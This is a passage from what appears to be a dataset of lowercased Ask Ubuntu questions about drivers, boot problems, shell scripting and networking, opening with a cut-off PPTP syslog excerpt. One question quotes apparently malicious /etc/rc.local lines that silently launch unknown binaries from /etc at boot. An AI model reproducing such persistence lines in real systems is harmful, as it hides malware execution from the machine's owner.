30 22:04:43 wg-tablet networkmanager [ 910 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) dec 30 22:04:43 wg-tablet pptp [ 15821 ] : nm-pptp-service-15814 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error dec 30 22:04:43 wg-tablet pppd [ 15815 ] : modem hangup dec 30 22:04:43 wg-tablet pptp [ 15821 ] : nm-pptp-service-15814 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log dec 30 22:04:43 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) dec 30 22:04:43 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' dec 30 22:04:43 wg-tablet pptp [ 15829 ] : nm-pptp-service-15814 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) dec 30 22:04:43 wg-tablet pppd [ 15815 ] : exit . dec 30 22:04:43 wg-tablet networkmanager [ 910 ] : < warn > vpn plugin failed : 1 dec 30 22:04:43 wg-tablet networkmanager [ 910 ] : < warn > vpn plugin failed : 1 dec 30 22:04:43 wg-tablet networkmanager [ 910 ] : < info > vpn plugin state changed : stopped ( 6 ) dec 30 22:04:43 wg-tablet networkmanager [ 910 ] : < info > vpn plugin state change reason : 0 dec 30 22:04:43 wg-tablet networkmanager [ 910 ] : < info > policy set 'auto nowififoryou ' ( wlan0 ) as default for ipv4 routing and dns . dec 30 22:04:43 wg-tablet networkmanager [ 910 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . dec 30 22:04:47 wg-tablet networkmanager [ 910 ] : < info > vpn service 'pptp ' disappeared dec 30 22:05:08 wg-tablet wpa_supplicant [ 1072 ] : wlan0 : wpa : group rekeying completed with 00:0c : f6 : b1:03:48 [ gtk=ccmp ]
397848	error when mounting usb hard drive	error mounting /dev/sdd1 at /media/nevos/elements : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdd1 '' `` /media/nevos/elements '' ' exited with non-zero exit status 12 : failed to read last sector ( 3907027119 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sdd1 ' : invalid argument the device '/dev/sdd1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? ( udisks-error-quark , 0 ) i am a beginner so plz help !
397849	ubuntu 12.04.3 fx5200 stuck at 640x480	i 'm trying to install ubuntu 12.04.3 on an old pc with fx5200 graphics card and i 'm stuck with 640x480 resolution . also , in the nvidia settings i get a message : unable to load x server display configuration page : the nvidia x driver on pc-name is not new enough to support the nvidia-settings display configuration page . i have nvidia driver version 173.14.37 i 've tried reinstalling drivers using apt and i 've ended up re-installing ubuntu .
397853	changed language to dutch and now my pictuers & documents folder is empty	i changed the language settings to dutch in order to get grammar check in libre office . after reboot i got the question if the folder names also should be changed to dutch . this shouldnt have any affect on the files stored . right now i noticed that my picture , documents and movie folder are all blanc . the downloads folder is still intact . i already tried to restore the system settings back to english , but the folders still have the dutch translations and are still empty . does anyone know how i can restore the language completely to english ( i think my folders will be back to normal then ) ? thank you
397856	sypnactic v 103s touchpad not moving	i have an hp split with a synaptics v 103s touchpad and it 's managed by `` evdev '' driver . it is detected on xinput . there is n't any switcher to enable/disable it but it acts like it was off . it does n't move the cursor or click . any suggestions ? it also happens on fedora 20 , suse and slackware .
397858	multimedia unclaimed error	my sound is n't working and when i go to see if ubuntu can see my sound card , i see this in the terminal *-multimedia unclaimed description : audio device product : 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fabf8000-fabfbfff my question is , how can i get my sound working ? yes it is unmuted and the dial on my device is turned up . in the sound settings , the only output that is shown is `` dummy device '' . it works perfectly fine in windows . i am running ubuntu 13.10
397859	how to : mount windows ( guest ) shared folder in ubuntu ( host ) via virtualbox	i 've just installed a fresh copy of ubuntu 13.10 and virtualbox 4.3.6 . i would like to be able to mount a windows folder in ubuntu . i have setup the windows folder as a shared folder \\pcname\folder . i 've also created a separate username and password to access this folder . i 've tried this , and had no luck : sudo mount -t vboxsf -o uid=1000 , gid=1000 share ~/pcname/folder virtualbox has been updated with the most recent updates and guest add-ons were installed .
397866	how do i fix master file table using ubuntu ?	so my friend accidentally messed up his mft and mftmirr of his ntfs windows 7 drive while installing ubuntu ( my guess is that he messed up the re-partitioning of his drive or something of the sort . he says that he has no idea how he did it ) he can boot ubuntu but booting windows just fails . does anyone know a good linux program to fix the mft ? ? if it can not be done does anyone know a good way to recover some of his files ?
397871	how to create a bootable usb stick on windows 8	i need to boot ubuntu from my usb drive.i did not face problems when creating with pendrive linux but nothing is displayed on the boot screen ?
397872	.bashrc not working after restart	i ca n't figure out what 's wrong with my pc ! i 'm quite new to ubuntu . i need to add android tools to the path variable so i add the following lines to .bashrc file : path= $ { path } : /home/user/program\ files/android-sdks/platform-tools : /home/user/program\ files/android-sdks/tools after that i run source .bashrc and when i run echo $ path the android tools shows up in the $ path variable . but when i logout android tools are gone from the $ path variable and i have to run source .bashrc to load them again there . any ideas why is it happening ?
397874	terminal engaged while using gedit or firefox	when i launch gedit or firefox from a terminal , the terminal is occupied ( by occupied i mean no other commands can be run from the same terminal window ) untill i press ctrl+c but it kills gedit or firefox . any way other than opening a new terminal window ?
397878	ubuntu broke my computer	about a week and a half ago i tried to update from 12.04 to 12.10 doing the sequential upgrades to get to the new os 13.1 . i downloaded 12.1 from the software center which i 've been told since that the sfc was not the best place to download an upgrade . the system took a long time to download but when it finished and rebooted it stuck on a black screen . so on google in search of answers i go , what i found was this page my computer boots to a black screen , what options do i have to fix it ? the 4th problem on that page sounds like the issue i 'm having so i followed the instructions in it , after i do a nomodeset and and ctrl + x there is a bit of a load screen , some commands flashing on the screen , then i see user log in . i log in and at this point if i was reading the solution page correctly i need to in install my graphics driver , ok , so i go here to learn how to do that from the terminal , since i am not a command line power user ( i hardly know what it is ) . can i install extra drivers via the command prompt ? i do `` jockey-text -- list '' and what is returned is that jockey , or jockey-text is not a command or program..so basically i think i know the problem ( i do n't have a graphics driver ) i just need help getting that downloaded and installed to my pc . this is all i know about my laptops hardware http : //www.cnet.com/laptops/toshiba-satellite-e105-s1402/4505-3121_7-33309979.html also if it is of any value , i did try to reinstall ubuntu before i learned that it was a driver issue , at this time my computer will not load anything from the cd or usb drives ... is that related to the issues i 'm having or is that a bios issue ? help me please and thank you .
397880	xububtu 12.04 internet super slow on wireless but fast on wired	when connected to the internet via wireless it runs really slow , for example , when iâm logged in to my google drive account and try to access a folder it takes super long to load and that 's if it does . it sometimes does it in other websites , but when i connect my laptop to my router via wired connection it runs fine and all folders on my google drive account open up smoothly . could it be a driver issue . i install xubuntu 12.04 on my laptop windows xp . i 'm really starting to like xubuntu and i want to keep enjoying it .
397882	firefox warnings	i am getting these warnings while launching firefox from a terminal : ( process:4049 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( firefox:4049 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( firefox:4049 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( firefox:4049 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( firefox:4049 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised
397885	bugs in touch-screen on dell developers edition with 12.04 ?	i just got this 13 '' dell xps13-9333 laptop ( aka sputnik - http : //www.dell.com/us/business/p/xps-13-linux/pd ) . personally , i was hoping to be able to use the touch-screen a lot , but it has been buggy to the point of being useless for everything from playing flash games to clicking on buttons and opening programs . i was wondering if these issues were just happening to me or if these problems were systemic across the model as a whole ? the touch-screen issues are organized according to number of fingers : one finger touch issues : sometimes fails to click ( or do anything ) when you tap , sometimes drags instead of clicks ( regardless of how high you set the drag threshold in `` touchpad and mouse '' or how quickly you tap the screen ) , randomly seems to double click ( in a flash game that i was playing ) mouse moves to an arbitrary point on screen just after a click occurs . two finger touch issues : two finger touch does n't do anything , despite there being a functional three and four finger touch . on the touch-pad , two finger touch right-clicks . should n't the same behavior occur on the touch-screen ? three finger touch issues : sometimes three finger touch brings up these white arrows that let me move and resize windows . other times , three finger touch does nothing . somewhat inconsistent . four finger touch : perfectly brings up the ubuntu launch menu every time . the only thing that works consistently is the four-finger touch gesture . so , for anyone else with the dell sputnik , are these touchscreen issues just on my computer , or are they systemic to the xps13 developers edition model as a whole ? p.s . if the issue is widespread , i would like for a bug report about it to please be filed . i tried , but there were too many procedures , and when i ran `` ubuntu-bug '' in the terminal i did not know how to classify it or what package the bug was coming from . dell 's prosupport team could n't help me at all . i tried with them for several days .
397889	is there a keyboard shortcut to obtain a non-breaking hyphen ?	i am writing pandoc markdown in the gedit text editor . from time to time , i need a non‑breaking hyphen . ( by the way , the hyphen in the previous sentence is one ! ) so far , i have been copying non-breaking hyphens from the character map which is quite cumbersome . this made me look for a quicker alternative ... hence , my question : is there any keyboard shortcut to obtain a non‑breaking hyphen ? alas , modifier keys do not seem to offer any help here ...
397891	apt-cache -- installed show lists packages that are not installed	the -- installed option does not appear to do anything . the man page is n't specific as to what is intended by its behavior , ie i ca n't tell if it either . for the applicable actions ( presumably show and showpkg ) : only returns the version of the package that is installed only returns information for packages that are installed that match the query in any case , it does not appear to do either of the above , instead returning the same output regardless of the option .
397896	fan settings - battery vs. plugged in	i 'm using ubuntu 13.10 on a lenovo y510p laptop with intel core i7-4700mq and an nvidia geforce gt755m graphics card which i 'm not really using thanks to bumblebee ( the only graphics driver loaded is intel ) . my problem is that the fan makes an annoying buzz at all times , even though the temperatures of everything are perfectly fine and the load is minimal . it stops , however , shortly after i unplug the laptop from a power source . my question is : can i determine what changes are made to the system settings when using battery power ? can i apply the same settings when it 's plugged in , perhaps just the fan settings ? so far i 've tried a few ways to check the state of the fan , but pwmconfig reports no pwm-capable modules and i ca n't get any other tool to work . also , i thought that perhaps some battery-saving settings are applied to the processor ( limit the number of cores in use ? ) which cause the fan to spin down , but i have no idea how to determine that . i would appreciate any help .
397897	how do i lauch sublime text 2 on ubuntu 12 ?	i just downloaded sublime text via this method how do i install sublime text 2 ? sudo add-apt-repository ppa : webupd8team/sublime-text-2 sudo apt-get update sudo apt-get install sublime-text now i want to launch it ( just simple gui launch for now ) to make sure it is installed . i see it in the history in the software center . but when i search in the software center under sublime-text i do n't see it . how do i launch the program ? i am new to ubuntu .
397899	using ifs to handle whitespace in filenames	in question how to rename all files in folder with name ending with `` _backup '' @ radu rädeanu gave a good answer that was useful to me as well : find . -type f -name '*.jpg_backup ' -print0 \ | while ifs= read -r -d '' file ; do mv -- `` $ file '' \ '' $ ( echo $ file | sed 's/_backup//g ' ) '' ; done however , i would like to fully understand his one-liner . precisely , the part that i do n't understand is : while ifs= read -r -d '' file i get that ifs is `` internal field separator '' and i suppose this is removing or ignoring the whitespace , but i do n't understand the syntax and the options . i would also like to understand why the -- is necessary after mv . could someone help ? thanks .
397900	please create self-installable usb option	creating a bootable usb stick is pretty easy , and that 's swell . what i would like is a bootable usb stick that can then install on itself . there are more and more systems being sold without cd drives , and more and more of them have lots ( more than 2gb ) of ram . usb sticks can be had for as low as 50 cents/gig , making them a great boot and install target . it would be super-nice if the ubuntu install image had a toram option that would then free up the install medium ( usb stick in this case ) to be the target of the install . specifically : boot off the usb with the live/install image use the 'install from ram ' option install the boot image into ram and run it be able to select the usb that you booted from as the target of a fresh install i 'd be satisfied if you had to have 2 partitions on the stick and could not actually install on the original boot source - but it 'd be double awesome if you could . thanks , kurt
397901	wi-fi browsing history	is there a way of viewing a wi-fi network 's browsing history ? ( probably using the command line ) is there a package which serves this purpose ? my os is ubuntu 13.10
397905	ubuntu 13.10 constantly grays out windows on good hardware	i just built a new computer , ( intel i5 3570k 3.4ghz , 8gb ram , 1gb nvidia geforce gtx 650 ti boost ) and am running ubuntu 13.10 on it on an 8gb flashdrive until i can get an actual hard drive . when ever i am clicking gui items , and 1/10 of the time the application will freeze , the whole window will fade to gray , and in 5-10 seconds will do what i clicked on and fade back to colored . this makes the entire os feel laggy and slow . i did n't have this problem in debian ( i had other issues there ) . i am having the same problem as why am i getting grayed-out windows in ubuntu 12.04 ? . could my flashdrive be too slow ? what should i do ?
397907	stand alone gpu or integrated intel graphics	i 'm running 13.10 on a desktop with core 2 duo 3.0ghz/ 7gb ram . will i get a performance advantage if i use a geforce gt 630 gpu instead of the intel corp. 4 series chipset integrated graphics controller ?
397908	ubuntu studio : no sound in audio production programs	i just installed ubuntu studio and when trying to use the audio production programs , i can not hear any sound out of my speakers . when i open mozilla however and play a youtube video , i can hear sound . how do i configure the audio production programs to output through my computer speakers ?
397911	imported vpn profile does n't save group password	i have a *.pcf file with credentials for connect to cisco vpn . importing was successful , but when i want to connect - pop-up window requires group password . i 'm checking that password - it 's on place and saved . i 've found the bug on this issue : https : //bugs.launchpad.net/ubuntu/+s ... nc/+bug/883037 , but still ca n't find the solution . please help
397916	install printer lexmark x4690 ( ubuntu 12.04 )	i am using ubuntu 12.04 , and tried to install a printer without sucess ( lexmark x4690 ) but it seems that this printer is no longer compatible as the last software available was to ubuntu 10 , but did not work with ubuntu 12 . i installed the driver using wine , but i do n't know if its possible to use it that way . does anyone now if it 's possible and how to proceed in this specific case ? http : //support.lexmark.com/index ? page=product & locale=en & productcode=lexmark_x4690 & segment=support & userlocale=en # 1
397922	download and 'mirror ' server sites	i want to download ubuntu , but i ca n't because when i try to download 13.10 for 64-bit , i get a .iso file at about 900 mb from some weird site usually unrelated to ubuntu . right now , my pc ( win 8 ) says '' do you want to open or save ubuntu- 13.10-desktop-amd64.iso ( 883 mb ) from mirrors.einstein.yu.edu '' the site is always mirrors .
397924	can not install ubuntu 13.10 on new hp spectre 13	i can not install ubuntu 13.10 on new hp spectre 13 , it boots onto black screen after selecting install ubuntu from bootable usb drive . thoughts ? thank you . here are the specs : windows 8.1 64 • 4th generation intel ( r ) core ( tm ) i7-4500u processor + intel ( r ) hd graphics ( for 8gb memory ) • onboard 8gb ddr3 system memory • 13.3-inch diagonal radiance full hd infinity led-backlit display ( 1920x1080 ) touchscreen • 128gb flash solid state drive • webcam and microphone • 802.11 ac wlan and bluetooth ( r ) [ 2x2 ] • usb ethernet adapter
397926	problem playing video files with ubuntu 12.04 lts	i 've just installed ubuntu 12.04.3 lts . my computer has a 2 x 1.86 ghz with 4 gb ram . i got trouble playing videos files like standard mp4 on my computer . either i only got sound or i do n't get anything . when i look into my system settings , it does n't tell me what are my graphics drivers or infos . i 've installed hardinfo to get all the informations , but if ca n't get anything out of it . my kind of a newby ( using the terminal too ... ) can you help me ?
397932	how do i send a message to people joining my wifi ?	i 'm new to ubuntu , and i 'm still trying to learn linux . so i had this idea to start a little project . when my friends come over , and they connect to my wifi , my linux computer would automatically send them a message saying something like `` welcome to my home '' as soon as they connected . i was trying to impress my friends , but the main goal is to actually learn linux better . problem is , i have no idea where to start . any help on learning or how to start it would greatly be appreciated .
397934	what do sapd , skysapd , sksapd , and ksapd do ?	does anyone know what sapd , skysapd , sksapd , ksapd do ? are they viruses ? i tried clamav it did n't recognized them as viruses . i also realized that my /etc/rc.local has multiple copies of this : nohup /etc/cupsdd > /dev/null 2 > & 1 & cd /etc ; ./ksapd cd /etc ; ./kysapd cd /etc ; ./atdd
397937	acer aspire v5-131-2840 brighness control with ubuntu 12.04 lts	i have just installed ubuntu 12.04 lts on an acer aspire v5-131-2840 netbook . everything except the screen brightness controls is working . under system settings > system > details it reports graphics : unknown . any help to make graphics card and brightness controls work correctly is welcome .
397938	how to patch the boot information table in iso master ?	i 'm using iso master and i 'm trying to create a bootable image file . i put in stage2_eltorito . now , how do i patch the boot information table ? i remember when i used windows i would use imgburn and check off patch boot information table .
397939	how to uninstall boost 1.49 and install boost 1.54 in ubuntu ?	i have a boost 1.49 in my ubuntu system . and i am trying to uninstall boost 1.49 and completely remove it from my system . and after that install the boost 1.54.0 i did like this to uninstall 1.49 from my system - sudo apt-get -- purge remove libboost-dev sudo apt-get -- purge remove libboost-all-dev and after that when i do below command to see the version , it still says i have 1.49 cat /usr/include/boost/version.hpp | grep `` boost_lib_version '' // boost_lib_version must be defined to be the same as boost_version # define boost_lib_version `` 1_49 '' not sure why ? and i tried installing boost 1.54.0 version like this - wget http : //sourceforge.net/projects/boost/files/boost/1.54.0/boost_1_54_0.tar.gz/download tar -xvzf boost_1_54_0.tar.gz cd boost_1_54_0/ ./bootstrap.sh -- with-libraries=atomic , date_time , exception , filesystem , iostreams , locale , program_options , regex , signals , system , test , thread , timer , log sudo ./b2 install but still it is not showing me boost 1.54.0 version installed ? any pointers how to remove boost 1.49 from my system and install boost 1.54 in my machine ?
397944	i can not boot from a ubuntu cd / dvd	i am trying to dual boot windows 7 and ubuntu 13.10 . after burning the iso and then booting the disc , i get to the purple menu that asks whether i want to try , install , or check disk . any option i select yields a black screen with a random letter highlighted in a random color . i have tried the uefi boot as well , and i get a grub menu asking the same options , and yielding the same results . i have tried nomodeset , and that has n't seemed to work . anyone got any ideas ? system specs : asus p8z77-v wd 500gb hdd 2x wd 128gb hdd ( 1 for backup , 1 for media storage ) nvidia quadro 295 nvs i5-3570k 8gb corsair vengeance ram
397953	wrong cursor in vnc session	i have set up tightvncserver and lxde on my xubuntu ( 13.10 ) . when i connect to the vnc server the remote lxde desktop shows up but i get a bold x cursor . the cursor becomes normal if i run 'lxappearance ' . my xstartup as below : # ! /bin/sh export xkl_xmodmap_disable=1 export xmodifiers= @ im=gcin export gtk_im_module=gcin export qt_im_module=gcin [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey autocutsel -fork gcin & exec startlxde how can i get a normal arrow cursor when i connect to the vnc server ? thank you for helping .
397955	how to configure ufw on ubuntu and still retain internet connection ?	i am having trouble with how to configure ufw firewall for my ubuntu 13.04 vps server . each time i enable the firewall , it closes all connections to the server . i need to open the following ports . i have installed lamp and phpmyadmin , mono-complete and nano ( as my text editor ) . i need to open non-standard ports as i am running opensimulator . first set of rules ( allow ) second set of rules ( deny out ) sudo ufw deny out 1:19/tcp sudo ufw deny out 1:19/udp sudo ufw deny out 25:52/tcp sudo ufw deny out 25:52/udp sudo ufw deny out 54:79/tcp sudo ufw deny out 54:79/udp sudo ufw deny out 81:122/tcp sudo ufw deny out 81:122/udp sudo ufw deny out 124:442/tcp sudo ufw deny out 124:442/udp sudo ufw deny out 444:8999/tcp sudo ufw deny out 444:8999/udp sudo ufw deny out 9010:99999/tcp sudo ufw deny out 9010:99999/udp sudo ufw deny out 10001:65535/tcp sudo ufw deny out 10001:65535/udp if someone could guide me through how to get this done it would be greatly appreciated as i ca n't understand why it 's not working .
397959	how do i get to my one key recovery menu after installing ubuntu	i was repartitioning my hard-drive to install , and my c drive got messed up ; i guessed this might happen , so i make a one key recovery backup and put it on my google drive . i tried the windows 8 built-in recovery , but it failed , so i just finished the ubuntu installation as i was looking a 5+ hours to download my back-up . the problem is that , after installing ubuntu , my novo ( interrupts shutdown ) button does not work . needless to say , i am trying to get windows working along side ubuntu . the only partition that was as damaged was the c drive .
397961	ubuntu terminal & operator	what does the following command do : comm1 & comm2 and how is it different from : comm1 & & comm2
397963	after installation , why wo n't my laptop boot with ubuntu 12.04.3 ?	after downloading ubuntu 12.04.3 , i proceed to restart my system and receive an error message . it basically says there an error with the file : ubuntu/winboot ( not exact ) . either there is an error or it 's corrupted . i 've tried removing and downloading several times with no luck . i have not been able to boot with ubuntu . please help ! i am using an asus n56v with windows 7 64 bit . my hard drive has 3 partitions ; c : main drive , b : blank drive ( potentially ubuntu ) ; and e : backup .
397965	can ubuntu 13.10 be installed on toshiba c840 ( wifi : realtek rtl8723ae ) ?	a year ago , i 'm try ubuntu 12.10 but it do'nt accept my wifi card : realtek rtl8723ae wireless lan 802.11n pci-e nic ( not rtl8723ae-bt ) update : my laptop : toshiba c840 my question : does ubuntu 13.10 support my wifi card ? or any ideal help me ? thanks you so much !
397966	nouveau quad monitors dual-gpu error : could not set the configuration for crtc 64	i have 2 gpu ( nvidia g96gl quadro fx 580 ) hooked to 2 monitors each , and while i was on 12.04 i was happily using all 4 monitors using the proprietary drivers . i recently upgraded to 13.10 and all hell broke loose . using proprietary drivers , the most i can get is 2 monitors under twinview the moment i enable xinerama and separate x-screens , i end up with a black screen on restart . no amount of tinkering with xorg.conf has been able to get me any further . i reverted to noueaou , and i am happily able to use 3 monitors now . any 3 but never 4 at a time , as the fourth one , although detected , is always disabled . if i try to enable the 4th monitor , i get two popups with the following messages : '' the selected configuration for displays could not be applied '' , `` could not set the configuration for crtc 64 '' , `` failed to apply configuration : % s '' , '' gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code2 : could not set the configuration for crtc 64 '' that 's where i am stuck after a week . tried all sorts of proprietary drivers , all sorts of instructions etc but i feel the only way to get back my 4th monitor is to downgrade to 12.04 and hope 14.04 does n't mess up things . anyone to help ?
397967	cron script length	i have a backup script , a script that cyncs file with other files on my computer , and a script that uploads files to my website with ncftp . i used cron to load .sh files , and my shorter scripts work , but my scripts that take long ( my ftp upload script and backup script ) do n't run . here 's my crontab file : 0 0 * * * ./desktop/backup.sh */5 * * * * ./desktop/file_sync.sh */5 * * * * ./desktop/file_upload.sh
397969	compiz like xfce application switcher	is it possible to have an application switcher in xfce that looks like unity without using compiz ? it 's very useful when alt+tab bring the window to front and we can see what we have in there .
397971	can i change watchdog 's action from 'reboot ' to 'halt ' ?	i would like to shutdown my server if serious problems are detected . is there anyway to do so using watchdog ? i have installed watchdog via sudo apt-get install watchdog and i was googling but there was only way for just reboot or soft-reboot . thank you !
397972	use shift+insert to paste from clipboard in gnome-terminal ?	i would like to press shift+insert and have that execute a paste from the clipboard ( the thing that ctrl+c copies to ) inside of gnome-terminal . in 13.10 , shift+insert pastes from the selection buffer ( the thing that selecting text writes to ) . in libre office , chrome , and firefox , shift+insert pastes from the clipboard . i would thus like to configure gnome-terminal to do the same . i would not like to use ctrl+shift+v . edit : i phrased this poorly . i would still like to use ctrl+shift+v but i did not want people to post that as a solution . the reason why i would like to use shift+insert is because a program i use sends the keys shift+insert assuming that it will paste . unfortunately , in gnome-terminal there is no setting for this under edit → profile preferences → compatibility , nor is there under edit → keyboard shortcuts . the only other related post i can find is : how to restore proper x clipboard behaviour ( shift+insert ) in 12.10 ? which i think prefers the opposite of what i prefer and is probably happy now with the change .
397975	roadmap process software	i am looking for an app that can be used to create a roadmap of all the processes a company or a development team needs to achieve over a course of time . if the app comes with an output as svg it would be excellent , if not , not big deal . it is actually something like calligraplan and planner but more in the style of something that can do one of the following types of roadmaps : or like this :
397976	adobe flash update	which of these do iu choose if i have ubuntu 12.04 installed ? this is from adobe 's update dl page for linux 32-bit , english , chrome these are the different versions i need to choose from : .tar.gz for other linux yum for linux .rpm for other linux apt for ubuntu 10.04+ sorry . i am new to ubuntu and appreciate all the help . thank you in advance .
397979	very choppy sound ubuntu 13.04	i am running ubuntu 13.04 64-bit on intel® core™ i5-2500k cpu @ 3.30ghz × 4 pc . when i go to system settings and click on sound , the screen keeps flashing between analog output and headphones in the play sound through section of the output tab . the screen does n't stay fixed , and i cant click on any of the buttons . when i try to play music the sound is extremely choppy . in terminal i opened alsamixer , and the surround , center lfe and side bars keep alternating between 0 and 100 ( regardless of if my logitech x-540 5.1 surround sound speakers are plugged in or not ) . i know the speakers work fine because i have windows 7 installed on the same pc and it worked immediately without any configuration . the alsa information script from my pc can be found here : http : //www.alsa-project.org/db/ ? f=00d9028d1118a30e3fadc9bc458ca8d65b3a9f2c i have tried uninstalling and reintalling alsa-base and pulse audio but that is not working . i also tried several suggestions including : https : //help.ubuntu.com/community/soundtroubleshooting . any ideas ?
397980	after installing nvidia driver , x is n't showing	i recently installed the nvidia 319 driver from the jockey window , and now x wo n't load ! i 'm stuck with a blinking cursor . i used to have the 304 drivers installed . how do i fix this ?
397982	can not access my ubuntu pc from my windows pc without ip address ?	i have ubuntu 12.4 on a laptop and windows xp on another laptop . i can see all the windows pcs fine on the ubuntu laptop however i am unable to see the ubuntu laptop from the windows laptop without putting in the ip address of the ubuntu laptop in internet explorer or windows explorer . why is the ubuntu machine not showing up in network places on the windows machine ?
397983	ubuntu 12.04 realtek rtl8188e wireless card not detected	i have ubuntu 12.04 ( wubi ) on my toshiba sattellite . i have a realtek rtl8188e wireless lan 802.11n . the internet works fine when i plug it in using a ethernet cable , but my laptop does n't even search for wifi . i have windows 7 and my wifi works fine . how do i make my wireless internet work ? when i command lspci -nn | grep 0280 i get realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 )
397986	black screen with the cursor blinking ( flashing )	you might think this is duplicate , but it 's not . i 've searched all around the internet and never found a solution . i might be a total linux newbie ( although i 've been using ubuntu and fedora for 3 years ) , but this just ca n't be normal . i have this old pc , unknown chipset , unknown graphic card ( i know it makes things harder ) . i only know it runs with a pentium iv processor and 512mb of ram . i decided to rescue that dinosaur in order to use it in my business place and install lubuntu 13.10 . once it was running ubuntu 10.10 , but really slow ( window $ like ) . when i installed 10.10 , i had a lot of trouble installing with the live cd and alternate cd and dvd ... the only one that worked for me was the minimal iso . and yes , i 've tried this my computer boots to a black screen , what options do i have to fix it ? but anyway it did n't work . when updating to lubuntu 13.10 ( because lxde is my one of my best shots ) , i had lots of trouble . i used again the minimal cd and it worked after 10 times i tried . once installed ( i had never installed lubuntu , so i went with `` minimal installation '' ; and before in my virtual machine everything went great , even though i had to install lxde manually because it booted as a terminal ) . but my headacher old machine decided to cause more problems after install . every time i boot , a blinking black screen comes out with the cursor .
397992	how do i uninstall lightworks ?	this is what i have tried so far : $ sudo apt-cache search lightworks lightworks - hollywood-strength editing for everyone $ sudo apt-get -- purge remove `` lightworks - hollywood-strength editing for everyone '' reading package lists ... done building dependency tree reading state information ... done e : unable to locate package lightworks - hollywood-strength editing for everyone ubuntu software center ca n't find lightworks .
397995	customize the command shell default prompt	need help to change the command prompt . i want short name . look below : kirti @ kirti-aspire-5733z : ~ $ cd workspace kirti @ kirti-aspire-5733z : ~/workspace $ cd ruby kirti @ kirti-aspire-5733z : ~/workspace/ruby $ i am looking for my initial command prompt , when i will open it using 'ctrl+alt+t ' as $ ( arup ) : $ ( arup ) : cd workspace $ ( workspace ) : cd ruby $ ( ruby ) : in my ~/.bashrc file did put as below : if [ `` $ color_prompt '' = yes ] ; then prompt_dirtrim=1 ps1='\w\ $ ' else ps1='\w\ $ ' by replacing if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else # ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' ps1='arup : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac but i did n't find any change in my shell : may i have some help to configure the above settings ?
397999	i ca n't find network connection in xubuntu xfce desktop environment	in unity i used to run system settings- > network to establish a dsl connection with username and password . i 've switched to xfce for better performance . now the problem is that i ca n't find such a thing in xfce . in terminal i typed : nm-connection-editor command , but it 's not installed . i removed unity from ubuntu software center . is there a way to make internet up and running as before ?
398001	dash and launcher is missing after installation	i got an hp compaq d530 cmt . i installed ubuntu 13.10 32-bit . when i booted up and logged in i saw only the desktop picture and nothing else . i have no idea what to do , at least i am familiar with terminal to carry out simple tasks with it . can anyone please tell me what is wrong and how to fix it . one particularly odd thing is that the unity plugin does n't show up in ccsm , even after following instructions to reset unity and rebooting .
398006	what is the command to connect a database remotely from other pc	what is the command to connect a database remotely from other pc . i am running a application in a pc1 ( client ) and storing some content of that application on a database . there is also one another pc2 ( client ) . the both pc1 ( clients ) & pc2 are within the same network connected via switch . now i want to access that database from pc2 . how it is possible ?
398007	boot an hp mini 210-1024 from a usb stick using 12.0.4.3 live .	i am trying to boot an hp mini 210-1024 from a usb stick using 12.0.4.3 live . this works on my ibm t-42 . the stick was built using unetbootin . the hp gets to the hp screen , the press esc to enter setup shows up on the bottom of the screen . the usb stick flashes a few times , then the unit locks up . any clue if this can be fixed ? i 'm a rookie .
398009	running ubuntu on hp 250	i am a ubuntu n00b ! i have decided to install it on my hp 250 . however , i am having video problems . i think it is the video driver . when ubuntu boots up the screen is black . it will stay black unless i plug it into another screen . then it works event if i unplug it . if the monitor goes to sleep it will not come back up . since i was running w8 just fine i do not think it is a physical problem with the hardware . where can i find this driver or is ther a factory disk for my computer ? thanks ! ! ! http : //www.ubuntu.com/certification/hardware/201301-12667/components/
